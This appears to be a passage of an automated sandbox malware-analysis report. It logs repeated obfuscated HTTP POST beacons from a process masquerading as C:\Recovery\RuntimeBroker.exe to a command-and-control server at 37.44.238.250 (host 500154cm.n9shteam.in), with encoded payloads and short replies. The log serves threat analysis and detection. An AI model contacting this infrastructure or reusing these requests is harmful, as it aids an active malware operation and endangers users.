                                                                                                            Data Ascii: TQ[RSZYZ\XZQP]XQ[T^]UXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:6\>(.5<'8X"($W)3&#+&'-*&#!_(5&[!"^.
                                                                                                            Nov 12, 2024 00:42:49.880039930 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:49.964745045 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:49 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.44977737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:50.093271017 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:50.447535992 CET2512OUTData Raw: 51 54 5b 51 53 5c 59 5e 5c 58 5a 51 50 52 58 56 5b 5d 5e 5d 55 5c 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[QS\Y^\XZQPRXV[]^]U\Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'93!=+&5&'6$Z (4=3&"^%3>5)&4 -?&[!"^.
                                                                                                            Nov 12, 2024 00:42:50.676969051 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:50.753743887 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.44977837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:51.895159960 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.44977937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:52.158725977 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:52.510154009 CET1840OUTData Raw: 51 56 5b 53 56 5d 5c 5d 5c 58 5a 51 50 5c 58 52 5b 55 5e 5f 55 54 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[SV]\]\XZQP\XR[U^_UTZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,#-=%R"&%&;"++*3._6805(6-# &)5&[!"^.1
                                                                                                            Nov 12, 2024 00:42:52.726392984 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:52.807996988 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 1f 3f 03 3f 5e 22 2c 30 18 3a 58 21 0d 31 0e 20 13 3f 3b 38 17 22 2e 1a 5d 3b 23 26 08 34 00 37 03 24 29 29 5a 23 2f 0b 15 28 02 21 5b 05 12 21 18 20 38 28 56 28 12 20 13 2e 31 0a 06 36 56 3f 16 39 07 2f 55 2a 39 39 1e 27 2c 26 54 30 1f 2f 07 2e 58 22 5c 3f 2c 24 0e 21 24 2e 55 0b 11 20 09 25 38 38 09 23 2f 2c 06 32 3d 34 1c 22 04 3e 57 32 39 34 57 25 2a 3c 03 25 22 22 5c 31 32 2a 16 25 3a 2e 06 3e 17 33 12 25 2a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !??^",0:X!1 ?;8".];#&47$))Z#/(![! 8(V( .16V?9/U*99',&T0/.X"\?,$!$.U %88#/,2=4">W294W%*<%""\12*%:.>3%*#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.44978037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:52.295039892 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:52.650631905 CET2512OUTData Raw: 51 51 5b 57 56 5a 59 52 5c 58 5a 51 50 5b 58 5d 5b 51 5e 5e 55 54 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QQ[WVZYR\XZQP[X][Q^^UTZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\9 )?;-"*D0% 8( *X#;)W0.>C.X#=+%&[!"^.-
                                                                                                            Nov 12, 2024 00:42:52.878885984 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:52.951802969 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.44978137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:53.079268932 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:53.447873116 CET2512OUTData Raw: 54 53 5e 53 53 5b 5c 58 5c 58 5a 51 50 5c 58 5c 5b 55 5e 50 55 59 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS^SS[\X\XZQP\X\[U^PUYZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.2[*;>",'58[!++)#*[58>0=>):Y4&?&[!"^.1
                                                                                                            Nov 12, 2024 00:42:53.669228077 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:53.746057034 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:53 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.44978237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:53.877695084 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:54.228776932 CET2512OUTData Raw: 54 54 5e 53 53 5a 59 52 5c 58 5a 51 50 5f 58 5d 5b 5c 5e 51 55 5d 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT^SSZYR\XZQP_X][\^QU]ZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-36Z*W5='4X584=0>5:$.!Z*6:#V9\+&[!"^.=
                                                                                                            Nov 12, 2024 00:42:54.446647882 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:54.525438070 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.44978337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:54.657130957 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:55.010478020 CET2512OUTData Raw: 51 54 5b 52 56 5b 5c 58 5c 58 5a 51 50 5d 58 55 5b 57 5e 5d 55 5b 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[RV[\X\XZQP]XU[W^]U[ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.01);W"<&E38X"=3"X5"$.[*C&70")%&[!"^.
                                                                                                            Nov 12, 2024 00:42:55.257982016 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:55.330940962 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.44978437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:55.481601000 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:55.838279963 CET2512OUTData Raw: 51 56 5e 55 56 5b 5c 5a 5c 58 5a 51 50 5f 58 55 5b 55 5e 50 55 54 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV^UV[\Z\XZQP_XU[U^PUTZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:3>*+W!*$3!;<V( *^!^&$=5>>[43)_<5&[!"^.=
                                                                                                            Nov 12, 2024 00:42:56.064641953 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:56.147361994 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.44978537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:56.445975065 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:56.791649103 CET2512OUTData Raw: 54 53 5b 55 56 5c 5c 5e 5c 58 5a 51 50 5e 58 54 5b 56 5e 50 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS[UV\\^\XZQP^XT[V^PUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-0>^=%T5"D06' 8')#*[!&$>5>.Z !_?&[!"^.9
                                                                                                            Nov 12, 2024 00:42:57.181226015 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:57.181324005 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:56 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ
                                                                                                            Nov 12, 2024 00:42:57.181368113 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:56 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.44978637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:57.320962906 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:57.666299105 CET2512OUTData Raw: 54 50 5b 5f 56 50 5c 5e 5c 58 5a 51 50 5c 58 53 5b 57 5e 5a 55 59 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[_VP\^\XZQP\XS[W^ZUYZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^,0=;95$645+$(#.Z6;9%>Z=2Y 6<5&[!"^.1


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            46192.168.2.44978737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:57.828654051 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:58.181957960 CET1840OUTData Raw: 54 5e 5b 56 56 5b 59 5e 5c 58 5a 51 50 5f 58 50 5b 5c 5e 5d 55 58 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T^[VV[Y^\XZQP_XP[\^]UXZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-3*\*8!!!$76;="!P$--]>"[7)5&[!"^.=
                                                                                                            Nov 12, 2024 00:42:58.408297062 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:58.484771967 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0e 2a 3d 30 07 22 3f 27 08 2d 3d 39 0f 27 30 2c 59 3c 28 24 17 36 00 16 10 2c 0d 0f 55 23 3d 30 5d 30 3a 25 5e 34 3f 0b 1b 2b 12 21 5b 05 12 22 06 37 02 3c 55 3c 3f 28 5b 2c 31 23 5a 22 1e 37 14 2d 29 27 19 29 00 25 57 33 2c 39 0a 27 31 2c 5f 2d 58 29 00 2b 59 34 0f 21 0e 2e 55 0b 11 20 0c 27 06 0d 50 23 2f 0d 5a 27 2d 38 1f 35 3d 0f 0a 26 29 34 1d 32 3a 23 1e 26 22 2e 5d 32 32 39 04 26 5c 3a 01 2a 3a 27 12 24 2a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "*=0"?'-=9'0,Y<($6,U#=0]0:%^4?+!["7<U<?([,1#Z"7-)')%W3,9'1,_-X)+Y4!.U 'P#/Z'-85=&)42:#&".]229&\:*:'$*#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            47192.168.2.44978837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:57.965363979 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:58.322570086 CET2512OUTData Raw: 54 50 5b 54 56 5f 59 52 5c 58 5a 51 50 58 58 54 5b 54 5e 5f 55 5a 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[TV_YR\XZQPXXT[T^_UZZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_936\="3C3"+$=3&#;5'\=&.4 *+&[!"^.!
                                                                                                            Nov 12, 2024 00:42:58.533256054 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:58.604937077 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            48192.168.2.44978937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:58.921369076 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:59.275695086 CET2512OUTData Raw: 51 55 5b 56 56 50 59 53 5c 58 5a 51 50 5e 58 55 5b 5c 5e 5b 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[VVPYS\XZQP^XU[\^[UXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'],#.=+=#,>$,5++>5!6$6*5*] 3")%&[!"^.9
                                                                                                            Nov 12, 2024 00:42:59.508398056 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:59.580563068 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:59 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            49192.168.2.44979037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:59.706056118 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
